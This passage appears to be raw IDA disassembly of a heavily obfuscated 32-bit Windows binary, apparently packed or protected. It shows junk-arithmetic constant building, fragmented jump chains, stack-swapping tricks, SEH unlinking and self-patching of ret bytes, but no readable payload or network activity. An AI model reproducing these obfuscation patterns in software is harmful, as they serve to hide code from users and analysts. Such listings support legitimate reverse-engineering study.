; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43953B

loc_443B93:				; CODE XREF: sub_43953B+109C4j
		sub	ebx, 728A70B9h
		call	sub_43B648

loc_443B9E:				; CODE XREF: sub_45B048-C2BCj
		add	edx, 5AAC47A4h
		or	edx, 4411B608h
		xor	edx, 0FC71F7CEh
		add	eax, edx
		jmp	loc_455F84
; END OF FUNCTION CHUNK	FOR sub_43953B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_443BB7:				; CODE XREF: sub_451D60+9A0j
		call	sub_44F7CF
		mov	eax, 3CC6743Ch
		push	esi
		push	4D659E32h
		pop	esi
		jmp	loc_453212
; END OF FUNCTION CHUNK	FOR sub_451D60

; =============== S U B	R O U T	I N E =======================================



sub_443BCD	proc near		; DATA XREF: sub_44363B+10941o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439E8D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00443A04 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444271 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445952 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044671E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D61 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044AD2E SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0044AE6C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044AF36 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00450F3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451121 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452841 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452A1A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453F54 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456DFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B5B0 SIZE 00000005 BYTES

		add	eax, 1EEB890Bh
		call	sub_44059F
		push	esi

loc_443BD9:				; CODE XREF: hvvrg7ie:loc_44DB78j
		push	506DF609h
		pop	esi
		and	esi, 0CCE60F25h
		jns	loc_448D61

loc_443BEB:				; CODE XREF: hvvrg7ie:00453F4Fj
		jmp	loc_452A1A
sub_443BCD	endp

; ---------------------------------------------------------------------------
		mov	edi, [esi]
		jmp	loc_44597E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFE7

loc_443BF7:				; CODE XREF: sub_43BFE7+11j
		pop	eax
		rol	eax, 0Ah
		test	eax, 2000h
		jmp	loc_44854B
; END OF FUNCTION CHUNK	FOR sub_43BFE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E9F

loc_443C06:				; CODE XREF: sub_454E9F:loc_442AFDj
		xor	edx, edx
		call	sub_453934
; END OF FUNCTION CHUNK	FOR sub_454E9F
; START	OF FUNCTION CHUNK FOR sub_451DE8

loc_443C0D:				; CODE XREF: sub_451DE8+6j
		jmp	loc_455FB3
; END OF FUNCTION CHUNK	FOR sub_451DE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_443C12:				; CODE XREF: sub_440C05+1477Dj
		jz	loc_43C082
		jmp	sub_43C485
; END OF FUNCTION CHUNK	FOR sub_440C05

; =============== S U B	R O U T	I N E =======================================



sub_443C1D	proc near		; CODE XREF: hvvrg7ie:00441CA0j
					; sub_45B048:loc_445EF9j ...

; FUNCTION CHUNK AT 0044F581 SIZE 00000014 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	edx
		call	sub_444B4D

loc_443C27:				; CODE XREF: sub_44EC16+12j
		jmp	loc_44F581
sub_443C1D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_443C2C:				; CODE XREF: sub_439FEE+DAAEj
		jmp	loc_43A7DA
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 0Fh
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_443C35:				; CODE XREF: sub_43B3BE:loc_43F580j
		mov	ds:dword_458DA4, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
		or	ebx, eax
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_443C3E:				; CODE XREF: sub_446D8D:loc_440DDAj
		jmp	sub_4393BC
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_443C43:				; CODE XREF: sub_45A234-1C332j
		xchg	edi, [esp+8+var_8]

loc_443C46:				; CODE XREF: hvvrg7ie:0043DADBj
		call	sub_442846
		test	eax, eax
		jnz	loc_43E1EE
		jmp	loc_452761
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
		add	edi, 0D38DB9D0h
		jbe	loc_44AA8C
		jmp	sub_440413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_443C69:				; CODE XREF: sub_43D285:loc_45B54Fj
					; DATA XREF: sub_44543A-2348o
		push	edi

loc_443C6A:				; CODE XREF: sub_457F6F:loc_44C655j
		push	4723CA62h
		pop	edi
		and	edi, 1917C3E0h
		rol	edi, 12h
		or	edi, 4F268780h
		jmp	loc_4556C9
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE41

loc_443C84:				; CODE XREF: sub_43AE41:loc_44D441j
		jnz	loc_451262
		sub	edi, ecx
		shl	eax, 19h
		not	edi
		add	eax, ecx
		jmp	loc_451260
; END OF FUNCTION CHUNK	FOR sub_43AE41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_443C98:				; CODE XREF: sub_453405+9E2j
		not	ebx

loc_443C9A:				; CODE XREF: sub_453405:loc_44D8B6j
		push	offset loc_4586C8
		jmp	loc_44CBDD
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
		mov	eax, esi
		jmp	sub_44DA1A
; ---------------------------------------------------------------------------
		sub	esi, 0B871D3BCh
		or	edx, eax
		jmp	sub_45006C

; =============== S U B	R O U T	I N E =======================================



sub_443CB8	proc near		; CODE XREF: hvvrg7ie:0043A4EBp
					; hvvrg7ie:00447D11j
		xchg	edx, [esp+0]
		pop	edx
		call	nullsub_492
		jmp	ds:dword_41D190
sub_443CB8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_443CC7:				; CODE XREF: sub_448663-2ECDj
		jmp	loc_451B90
; END OF FUNCTION CHUNK	FOR sub_448663
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_492. PRESS KEYPAD	"+" TO EXPAND]
		db 0F6h, 7Dh, 0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455CB0

loc_443CD1:				; CODE XREF: sub_455CB0+7j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_455CB0
; ---------------------------------------------------------------------------

loc_443CD6:				; DATA XREF: sub_44D3E8-EF89o
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_447172
		jmp	loc_457DB0
; ---------------------------------------------------------------------------

loc_443CE8:				; CODE XREF: hvvrg7ie:loc_456330j
		call	sub_455751
		mov	eax, 0E5254649h
		push	eax
		push	0DE5242C4h
		pop	eax
		jmp	loc_44749A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_443CFE:				; CODE XREF: sub_450AA8-76E3j
		sub	edx, 31DE20E8h
		jmp	loc_444BA3
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_443D09:				; CODE XREF: sub_446E8C+Ej
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_457B6A
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_443D15:				; CODE XREF: sub_44CB64-340Cj
		add	edx, ebp
		push	offset loc_44E437
		jmp	nullsub_96
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AA0

loc_443D21:				; CODE XREF: sub_452AA0-181AEj
		call	sub_43BA56
; END OF FUNCTION CHUNK	FOR sub_452AA0
; START	OF FUNCTION CHUNK FOR sub_44E44E

loc_443D26:				; CODE XREF: sub_44E44E+2BD9j
		jmp	loc_44A3DE
; END OF FUNCTION CHUNK	FOR sub_44E44E

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_443D2B	proc near		; CODE XREF: sub_43B8A5+7B2Cp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00439823 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004438DB SIZE 0000001F BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_0]
		test	byte ptr [eax-8], 10h
		jmp	loc_439823
sub_443D2B	endp

; ---------------------------------------------------------------------------
		jnz	loc_43B48F
		jmp	sub_441FE4
; ---------------------------------------------------------------------------

loc_443D51:				; CODE XREF: hvvrg7ie:loc_450F30j
		and	esi, 0D249FCE6h
		sub	esi, 0B7582009h
		and	esi, 1AF2B79Fh
		add	esi, 0E5A41DE2h
		xchg	esi, [esp]
		jmp	nullsub_10
; ---------------------------------------------------------------------------
		mov	edi, 6EAC0F9Fh
		xor	edi, edx
		jmp	sub_441BE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_443D7D:				; CODE XREF: sub_440881+8j
					; sub_44736C+1FDAj ...
		jmp	loc_444260
; ---------------------------------------------------------------------------

loc_443D82:				; CODE XREF: sub_44736C+A8AFj
					; sub_440881+14AF0j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44736C

; =============== S U B	R O U T	I N E =======================================



sub_443D85	proc near		; CODE XREF: sub_456F18:loc_447E3Ap
		push	eax
		call	sub_452F0E

loc_443D8B:				; CODE XREF: sub_446072-A96Aj
		pop	edi
		rol	eax, 14h

loc_443D8F:				; CODE XREF: sub_443766+12j
		call	sub_43D980

loc_443D94:				; CODE XREF: sub_452AA0+341j
		jmp	nullsub_46
sub_443D85	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDAE

loc_443D99:				; CODE XREF: sub_43FDAE-3720j
		jmp	loc_455B95
; END OF FUNCTION CHUNK	FOR sub_43FDAE
; ---------------------------------------------------------------------------

loc_443D9E:				; CODE XREF: hvvrg7ie:00451CB0j
		rol	eax, 4
		jmp	loc_452732
; ---------------------------------------------------------------------------

loc_443DA6:				; CODE XREF: hvvrg7ie:0045053Ej
		or	esi, 0B3B4DA23h
; START	OF FUNCTION CHUNK FOR sub_4540B2

loc_443DAC:				; CODE XREF: sub_4540B2:loc_45052Bj
		add	edx, 551698DAh
		and	edx, 0E6CA9EB2h
		xor	edx, 8630FD5Fh
		add	edx, ebp
		push	offset loc_44D5EB
		jmp	nullsub_278
; END OF FUNCTION CHUNK	FOR sub_4540B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449885

loc_443DCA:				; CODE XREF: sub_449885:loc_4451EDj
		jz	loc_44770C
; END OF FUNCTION CHUNK	FOR sub_449885
; START	OF FUNCTION CHUNK FOR sub_456FBD

loc_443DD0:				; CODE XREF: hvvrg7ie:0043AAF9j
					; sub_456FBD+7j
		jmp	nullsub_260
; END OF FUNCTION CHUNK	FOR sub_456FBD
; ---------------------------------------------------------------------------
		shl	edi, 7
		jmp	loc_447706
; ---------------------------------------------------------------------------
		pop	edi
		jmp	sub_447842
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_443DE3:				; CODE XREF: sub_446B4C:loc_441219j
		jnz	loc_4397D3

loc_443DE9:				; CODE XREF: sub_44D2F8:loc_457880j
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		jmp	loc_45B545
; END OF FUNCTION CHUNK	FOR sub_446B4C

; =============== S U B	R O U T	I N E =======================================



sub_443DF4	proc near		; CODE XREF: hvvrg7ie:0045091Ap
					; hvvrg7ie:004538E1j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044884B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004588FA SIZE 00000020 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ecx, [esp-4+arg_0]
		push	ecx
		jmp	loc_44884B
sub_443DF4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_443E01:				; CODE XREF: sub_44E533:loc_44DAA4j
		add	eax, 97AFF7F0h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441714
		jmp	loc_45846A
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------

loc_443E17:				; CODE XREF: hvvrg7ie:loc_44D04Aj
		jnz	loc_44DBA6

loc_443E1D:				; CODE XREF: hvvrg7ie:loc_43E989j
					; hvvrg7ie:0044FC87j
		jmp	loc_4393A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB23

loc_443E22:				; CODE XREF: sub_44AB23+5j
		jmp	loc_440894
; END OF FUNCTION CHUNK	FOR sub_44AB23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_443E27:				; CODE XREF: sub_4589D3:loc_43FB41j
		pushf
		jmp	sub_44DBA5
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
		sub	ecx, edx

loc_443E2F:				; CODE XREF: hvvrg7ie:0044DB17j
		jmp	sub_444219
; ---------------------------------------------------------------------------
		pop	large dword ptr	fs:0
		add	esp, 4
		or	eax, eax
		jnz	loc_442656
		jmp	loc_43BB92

; =============== S U B	R O U T	I N E =======================================



sub_443E4B	proc near		; CODE XREF: sub_419430+3Cp
					; sub_419430+43p ...
		call	sub_443E56
		jmp	ds:off_41D1F0
sub_443E4B	endp


; =============== S U B	R O U T	I N E =======================================



sub_443E56	proc near		; CODE XREF: sub_443E4Bp
					; sub_443E56:loc_445400j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F244 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00445400 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044896C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D196 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451193 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00456B61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458784 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00459397 SIZE 0000001E BYTES

		jnz	loc_44D196
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	loc_44896C
sub_443E56	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_443E65	proc near		; CODE XREF: hvvrg7ie:0043F868j
					; sub_44B1C6+FE0Bp

; FUNCTION CHUNK AT 004410BB SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xor	eax, 6FFEA68Fh
		call	sub_457C82
		jmp	loc_4410BB
sub_443E65	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_443E79:				; CODE XREF: sub_45038B+4DA8j
		jz	loc_441F88
		jmp	loc_44DCE0
; END OF FUNCTION CHUNK	FOR sub_45038B

; =============== S U B	R O U T	I N E =======================================



sub_443E84	proc near		; DATA XREF: sub_445CCD+DE5Fo

; FUNCTION CHUNK AT 00457C36 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B3C3 SIZE 00000005 BYTES

		add	eax, ebp
		push	edi
		push	70D7538Ah
		pop	edi
		sub	edi, 16931278h
		add	edi, ds:4000F1h
		xor	edi, 96ECBBEDh
		jmp	loc_45B3C3
sub_443E84	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E8E

loc_443EA4:				; CODE XREF: sub_444E8E+Aj
		pop	eax
		or	eax, 0FD65BF7Fh
		xor	eax, 99B0A458h
		and	eax, 3EDF3840h
		jmp	loc_4463A5
; END OF FUNCTION CHUNK	FOR sub_444E8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_443EBC:				; CODE XREF: sub_44E3B3-B152j
		jnz	loc_44718A
		jmp	loc_45B90F
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_443EC7:				; CODE XREF: sub_4413A5:loc_445D5Ej
		jz	loc_44A0A1
		jmp	loc_44D713
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------

loc_443ED2:				; CODE XREF: hvvrg7ie:00439ABCj
		jz	loc_44BDE0
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_443ED8:				; CODE XREF: sub_4554E8-28E2j
		jmp	loc_44621E
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
		sbb	ebp, eax

loc_443EDF:				; CODE XREF: hvvrg7ie:loc_4442B3j
		cmp	ebp, 29A34537h
		jmp	loc_446DE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_443EEA:				; CODE XREF: sub_450F97+91CCj
		xor	edx, 4744B82Bh
		add	edx, 0C9DCB20Ah
		or	edx, 2C5DD6E5h
		xor	edx, 0BF10FC1Ah
		jmp	loc_4434F3
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_443F07:				; CODE XREF: sub_450E01:loc_442D07j
		xchg	edx, [edi]
		jmp	loc_439E7C
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------

loc_443F0E:				; CODE XREF: hvvrg7ie:0043A4CAj
		mov	[ebp+0], ecx
		shr	ebp, 18h
		test	ebx, 2C82B633h
		jmp	loc_44512E
; ---------------------------------------------------------------------------
		push	edx
		push	0AE38DFE9h
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_443F25:				; CODE XREF: sub_445CCD:loc_4533DBj
		xchg	edi, [esp+8+var_8]
		mov	edx, edi
		pop	edi
		and	edx, 0F260AFDFh
		rol	edx, 6
		jmp	loc_43B405
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
		mov	ds:off_41D174, eax
		lea	eax, sub_45A310
		mov	byte ptr [eax],	0C3h
		jmp	sub_45A310

; =============== S U B	R O U T	I N E =======================================



sub_443F4D	proc near		; DATA XREF: .data:off_42744Co

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EF39 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045665C SIZE 0000001A BYTES

		push	edx
		push	1CEBD4DAh
		pop	edx
		xor	edx, 0C10F9089h
		rol	edx, 1Ah
		jmp	loc_43EF39
sub_443F4D	endp

; ---------------------------------------------------------------------------

loc_443F62:				; CODE XREF: hvvrg7ie:0045551Bj
		push	0EBE2F972h
		pop	edx
		xor	edx, 509A6F30h
		or	edx, ds:4000FAh
		and	edx, 0AC340855h
		jmp	loc_451CA5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_428. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7BD

loc_443F80:				; CODE XREF: sub_45B7BD+7j
		jmp	loc_44BF58
; END OF FUNCTION CHUNK	FOR sub_45B7BD
; ---------------------------------------------------------------------------

loc_443F85:				; CODE XREF: hvvrg7ie:00456969j
		jmp	locret_453342
; ---------------------------------------------------------------------------

loc_443F8A:				; CODE XREF: hvvrg7ie:0044A609j
		jmp	loc_44CCE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4584F2

loc_443F8F:				; CODE XREF: sub_4584F2-15FDAj
		jmp	loc_45A0C1
; END OF FUNCTION CHUNK	FOR sub_4584F2
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_439953
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_443F9A:				; CODE XREF: sub_440AD9:loc_446626j
		pop	ecx

loc_443F9B:				; CODE XREF: sub_451110:loc_442FA2j
		and	ecx, 5E904943h
		jns	loc_4481A7

loc_443FA7:				; CODE XREF: sub_43AB99+B69Dj
		jmp	loc_43B1FB
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
		sbb	ebx, edx
		jmp	loc_43E66D
; ---------------------------------------------------------------------------
		test	eax, ecx
		jmp	loc_43B84B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_443FBA:				; CODE XREF: sub_44A6D7:loc_44A6E0j
		pop	edi
		or	edi, 0F76E46EEh
		cmp	edi, 0F07ADFBEh
		jmp	loc_4593C1
; END OF FUNCTION CHUNK	FOR sub_44A6D7

; =============== S U B	R O U T	I N E =======================================



sub_443FCC	proc near		; CODE XREF: hvvrg7ie:loc_43D386p
					; hvvrg7ie:0043D8F2j

; FUNCTION CHUNK AT 0044AD10 SIZE 0000001E BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]

loc_443FD6:				; CODE XREF: sub_4462F9-7E0Ej
		call	sub_4425F0
		jmp	loc_44AD10
sub_443FCC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 4AC5B528h
		push	edx
		push	813D711Ah
		pop	edx
		xor	edx, 0EBDAFF3Eh
		jmp	loc_43B48F
; ---------------------------------------------------------------------------

loc_443FF7:				; CODE XREF: hvvrg7ie:00456F4Cj
		pop	eax
		or	eax, 4C25B56Ch
		and	eax, 0E34AC3C4h
		sub	eax, 0A69BF880h
		or	eax, 3124643Ch
		jmp	loc_43A9E3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_398. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_444016:				; CODE XREF: sub_43D531+1A68Ej
		jmp	loc_45074B
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B63C

loc_44401B:				; CODE XREF: sub_43B63C+14C85j
		jmp	nullsub_150
; END OF FUNCTION CHUNK	FOR sub_43B63C
; ---------------------------------------------------------------------------

loc_444020:				; CODE XREF: hvvrg7ie:0045014Fj
		jmp	loc_459CCC
; ---------------------------------------------------------------------------

loc_444025:				; CODE XREF: hvvrg7ie:0043BC65j
		jmp	loc_459662
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_44402A:				; CODE XREF: sub_43EF3E:loc_43EFE2j
					; hvvrg7ie:0043FBB5j
		rol	eax, 3
		push	eax

locret_44402E:				; CODE XREF: sub_450F97:loc_43DE3Ej
		retn
; END OF FUNCTION CHUNK	FOR sub_43EF3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439953

loc_44402F:				; CODE XREF: sub_439953+21471j
		jmp	loc_4433A5
; END OF FUNCTION CHUNK	FOR sub_439953

; =============== S U B	R O U T	I N E =======================================



sub_444034	proc near		; CODE XREF: sub_449C2D:loc_43AEC9j
					; sub_43D285:loc_4444EBp

; FUNCTION CHUNK AT 0043935E SIZE 00000005 BYTES

		push	ebp

loc_444035:				; CODE XREF: hvvrg7ie:loc_44DC09j
		push	offset loc_44E330
		jmp	loc_43935E
sub_444034	endp


; =============== S U B	R O U T	I N E =======================================



sub_44403F	proc near		; CODE XREF: hvvrg7ie:00441D11j
					; sub_441242+14BB7p
		xchg	edi, [esp+0]
		pop	edi
		add	edx, 28FFAF61h
		add	edx, ebp
		push	offset loc_441EA4
		jmp	nullsub_48
sub_44403F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_444055:				; CODE XREF: hvvrg7ie:00457E0Cj
					; sub_45A234-19Dj
		or	edx, 0EAE9440Bh
		sub	edx, 192D5A05h
		xor	edx, 84ED2379h
		or	edx, 0DB6C4340h
		add	edx, 4D66D81h
		jmp	loc_443826
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
		push	0CCD4064Dh
		jmp	sub_444593
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_436. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_325. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_444084:				; CODE XREF: sub_44DB53+D5BCj
		jmp	loc_43E62B
; END OF FUNCTION CHUNK	FOR sub_44DB53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_444089:				; CODE XREF: sub_45B9BB-1B78Dj
		jmp	loc_44A1E1
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44408E:				; CODE XREF: sub_43D285-17E1j
		jmp	loc_453DB5
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		shl	esi, 14h
		jmp	sub_43CEB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44409B:				; CODE XREF: sub_43E063:loc_44FCE9j
		jz	loc_44B52E
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F7h
		jnz	loc_4463AD
		jmp	loc_44B52E
; ---------------------------------------------------------------------------

loc_4440B6:				; CODE XREF: sub_43E063:loc_44108Aj
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		jz	loc_44B52E
		jmp	loc_4390F8
; END OF FUNCTION CHUNK	FOR sub_43E063

; =============== S U B	R O U T	I N E =======================================



sub_4440CB	proc near		; CODE XREF: hvvrg7ie:00442836j
					; hvvrg7ie:loc_450A5Bp

; FUNCTION CHUNK AT 00444D26 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447172 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D833 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458FC4 SIZE 0000000C BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebx
		push	0EFFADD83h
		pop	ebx
		or	ebx, 0F6FE0E5Fh
		jmp	loc_444D26
sub_4440CB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ebp, 2E9753BBh
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_4440E6:				; CODE XREF: sub_4500FA:loc_450849j
		jmp	sub_44A1B5
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
		mov	edx, eax
		jmp	sub_45579D
; ---------------------------------------------------------------------------

loc_4440F2:				; CODE XREF: hvvrg7ie:00446448j
		sub	edi, 5BD05FAEh
		jb	loc_4407DC
; START	OF FUNCTION CHUNK FOR sub_451F50

loc_4440FE:				; CODE XREF: sub_451F50+80ECj
		jmp	loc_44DDF7
; END OF FUNCTION CHUNK	FOR sub_451F50
; ---------------------------------------------------------------------------
		shr	edi, 0Ah
		jmp	loc_43CF06
; ---------------------------------------------------------------------------

loc_44410B:				; CODE XREF: hvvrg7ie:004472E6j
		pop	edx
		and	edx, ds:4000F0h
		sub	edx, 67E01D1Bh
		rol	edx, 1Ch
		xor	edx, 0C15A0EDCh
		jmp	loc_45067D

; =============== S U B	R O U T	I N E =======================================



sub_444126	proc near		; CODE XREF: sub_45B862j
					; DATA XREF: sub_45A91B+F3Do
		mov	byte ptr [eax],	0C3h
		jmp	sub_45A91B
sub_444126	endp


; =============== S U B	R O U T	I N E =======================================



sub_44412E	proc near		; CODE XREF: sub_405F00+247p
					; sub_405F00+2A2p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AB56 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00445D93 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00448F6E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00452DA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455968 SIZE 0000000B BYTES

		push	esi
		push	81E539C6h
		pop	esi
		xor	esi, 0C154AE6Ah
		test	esi, 4000000h
		jmp	loc_455968
sub_44412E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4485A2

loc_444146:				; CODE XREF: sub_4485A2+15j
		call	sub_444F21

loc_44414B:				; CODE XREF: sub_448663:loc_43B734j
		jmp	loc_4459A5
; END OF FUNCTION CHUNK	FOR sub_4485A2
; ---------------------------------------------------------------------------
		push	0D2A41057h
		pop	eax
		or	eax, 5CC44E9Dh
		xor	eax, 17DD5653h
		add	eax, 2D376C04h
		rol	eax, 15h
		test	eax, 20000000h
		jmp	loc_43A791
; ---------------------------------------------------------------------------
		push	ecx
